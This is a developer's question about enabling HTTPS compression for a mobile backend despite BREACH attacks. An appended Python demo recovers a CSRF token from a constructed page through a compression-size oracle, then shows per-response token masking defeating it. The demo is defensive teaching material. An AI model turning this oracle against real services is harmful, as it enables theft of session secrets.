
HTTPS compression, CSRF and mobile apps

Çağlar Arlı


I have a backend for a mobile application that has to serve large JSON responses from time to time. The transfer would be greatly helped by enabling compression, especially when the user has bad coverage.

Googling, it seems that enabling compression for HTTPS endpoints is considered bad practice because of BREACH attacks; looking into BREACH attacks, it seems that the easiest way to mitigate them is using a CSRF token.

Looking into CSRF tokens for mobile, it seems the consensus is that mobile apps are not vulnerable to CSRF (I found some resources stating that using a signed double-submit cookie would make it possible to implement for mobile apps, but that it is not strictly necessary).

This leaves me wondering: what is the best way to provide compressed data to a mobile application from a backend?
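The mechanics behind the BREACH concern raised above, as an added example that is not part of the original post: a constructed page puts a hidden CSRF field and an attacker-influenced search string into the same compressed response, a size oracle then recovers the token one hex digit at a time from compressed lengths alone, and a per-response masking scheme (the idea behind Rails' masked authenticity token) leaves the same oracle recovering only the public, single-use mask. The page markup, the token value, the filler strings and the `mask:masked` field format are assumptions made for this demo; Python's zlib stands in for the server's HTTP compression.

```python
import hmac
import secrets
import zlib

HEX_DIGITS = "0123456789abcdef"

# Constructed demo secret (not from the post): a 16-hex-digit CSRF token
# that the server embeds in every rendered page.
TOKEN = "7f3a9c2b1e4d6a08"


def render_page(csrf_field: str, reflected: str) -> bytes:
    """Constructed victim page: a hidden CSRF field and an attacker-influenced
    search string land in one response body, which is exactly what BREACH needs."""
    html = (
        '<html><body><form action="/transfer" method="post">'
        f'<input type="hidden" name="csrf" value="{csrf_field}">'
        "</form>"
        f"<p>No results for: {reflected}</p></body></html>"
    )
    return html.encode()


def compressed_len(body: bytes) -> int:
    """Size of the body as the network sees it after HTTP compression.
    Z_FIXED pins the Huffman table so only LZ77 back-references move the size;
    against dynamic tables real BREACH tooling adds more tries to average out
    the noise (assumption for the demo: the server uses zlib/DEFLATE)."""
    comp = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return len(comp.compress(body) + comp.flush())


# Two tries per guess (adapted from the BREACH paper's "two tries"): the filler
# shifts where the match starts, so a one-character extension of the match
# that rounds away to zero bytes in one try still shows up in the other.
FILLERS = ("", "wxyzwxyz")


def size_oracle(render, guess: str) -> int:
    """Summed compressed size over both tries for one guess. `render` is the
    attacker's handle on the victim: reflected text in, compressed bytes out."""
    return sum(compressed_len(render(f'{filler}value="{guess}')) for filler in FILLERS)


def recover_token(render, length: int = 16) -> str:
    """Byte-by-byte BREACH: the guess that extends the LZ77 match against the
    hidden field by one more character compresses to fewer bytes."""
    known = ""
    for _ in range(length):
        known += min(HEX_DIGITS, key=lambda c: size_oracle(render, known + c))
    return known


def mask_token(token_hex: str) -> str:
    """Per-response masking: emit a fresh random mask and (mask XOR token), so
    the raw token never appears in the body and every response differs."""
    token = bytes.fromhex(token_hex)
    mask = secrets.token_bytes(len(token))
    masked = bytes(m ^ t for m, t in zip(mask, token))
    return mask.hex() + ":" + masked.hex()


def unmask_token(field: str) -> str:
    """Undo mask_token; raises ValueError on a malformed field."""
    mask_hex, masked_hex = field.split(":", 1)
    mask, masked = bytes.fromhex(mask_hex), bytes.fromhex(masked_hex)
    return bytes(m ^ x for m, x in zip(mask, masked)).hex()


def csrf_valid(field: str, session_token_hex: str) -> bool:
    """Server-side check: unmask, then constant-time compare with the session's token."""
    try:
        return hmac.compare_digest(unmask_token(field), session_token_hex)
    except ValueError:
        return False


if __name__ == "__main__":
    plain = recover_token(lambda reflected: render_page(TOKEN, reflected))
    print("plain page:  recovered", plain, "(correct)" if plain == TOKEN else "(wrong)")

    field = mask_token(TOKEN)
    masked = recover_token(lambda reflected: render_page(field, reflected))
    print("masked page: recovered", masked, "which is only the public mask")
    print("server still accepts the masked field:", csrf_valid(field, TOKEN))
```

What the demo makes concrete is that BREACH needs three things at once: a secret in the response body, attacker-chosen text reflected into that same body, and a way to make the victim's client send many requests whose compressed sizes the attacker can observe. A body that contains no secret, or reflects nothing the attacker chose, gives the oracle nothing to extend a match against; where both are present, masking the secret per response as above is the standard fix, and the oracle then learns only a value that is useless without the matching masked half.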